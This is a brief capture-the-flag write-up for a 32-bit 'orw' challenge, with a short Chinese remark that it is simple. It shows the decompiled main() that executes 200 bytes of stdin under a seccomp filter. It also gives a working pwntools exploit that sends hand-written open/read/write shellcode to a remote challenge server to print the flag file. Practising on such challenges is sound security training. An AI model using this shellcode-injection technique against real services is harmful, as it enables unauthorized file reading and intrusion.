32位orw,很简单没啥好说的
/*
 * Decompiled entry point of the challenge binary, as reproduced in the writeup.
 *
 * Root cause: up to 0xC8 (200) bytes are read from stdin straight into the
 * global buffer `shellcode`, and that buffer is then called as a function, so
 * whoever writes to stdin chooses the code that runs. The call relies on the
 * buffer's page being executable; with NX enforced on .bss/.data the indirect
 * call would fault instead of executing the input.
 *
 * orw_seccomp() is defined elsewhere in the binary. By its name it presumably
 * installs a seccomp filter that limits the process to open/read/write, which
 * bounds what the injected code can do but does not prevent the control-flow
 * hijack itself -- TODO confirm against the actual filter.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
orw_seccomp();                      /* sandbox is installed before any untrusted input is read */
printf("Give my your shellcode:");
read(0, &shellcode, 0xC8u);         /* return value ignored: a short read is not detected */
((void (*)(void))shellcode)();      /* transfers control into the bytes just read */
return 0;
}
# pwntools script from the writeup. The address and offsets below are the ones
# quoted on this page; they assume the binary is mapped at a fixed base (no PIE),
# so the global `shellcode` buffer that main() reads into has a constant address.
from pwn import *
context(arch = "i386", os = "linux", endian = "little")
context.terminal = ['tmux', 'splitw', '-h']
#io = process("./orw")
#io = remote("chall.pwnable.tw", 10001)
io = remote("node4.buuoj.cn", 25113)
elf = ELF("./orw")
#gdb.attach(io, 'b *0x08048582')
# Address of the global buffer main() reads 0xC8 bytes into and then calls.
shellcode = 0x0804A060
# Only open/read/write are used -- the three syscalls the seccomp filter in the
# binary is expected to permit (presumed from the function name orw_seccomp).
# The three format arguments are absolute addresses inside that same buffer:
# {0} the path string appended below, {1}/{2} scratch space for the file data.
orw = asm("""
mov eax, 5
mov ebx, {0}
xor ecx, ecx
xor edx, edx
int 0x80
mov ebx, eax
mov eax, 3
mov ecx, {1}
mov edx, 0x50
int 0x80
mov eax, 4
mov ebx, 1
mov ecx, {2}
mov edx, 0x50
int 0x80
""".format(shellcode+0x39, shellcode+0x100, shellcode+0x100))
# The two prints exist to confirm that len(orw) is 0x39, i.e. that the path
# appended next lands exactly at the offset {0} points to.
print(hex(len(orw)))
orw += b"./flag"
print(hex(len(orw)))
io.sendafter(b"shellcode:", orw)
#pause()
io.interactive()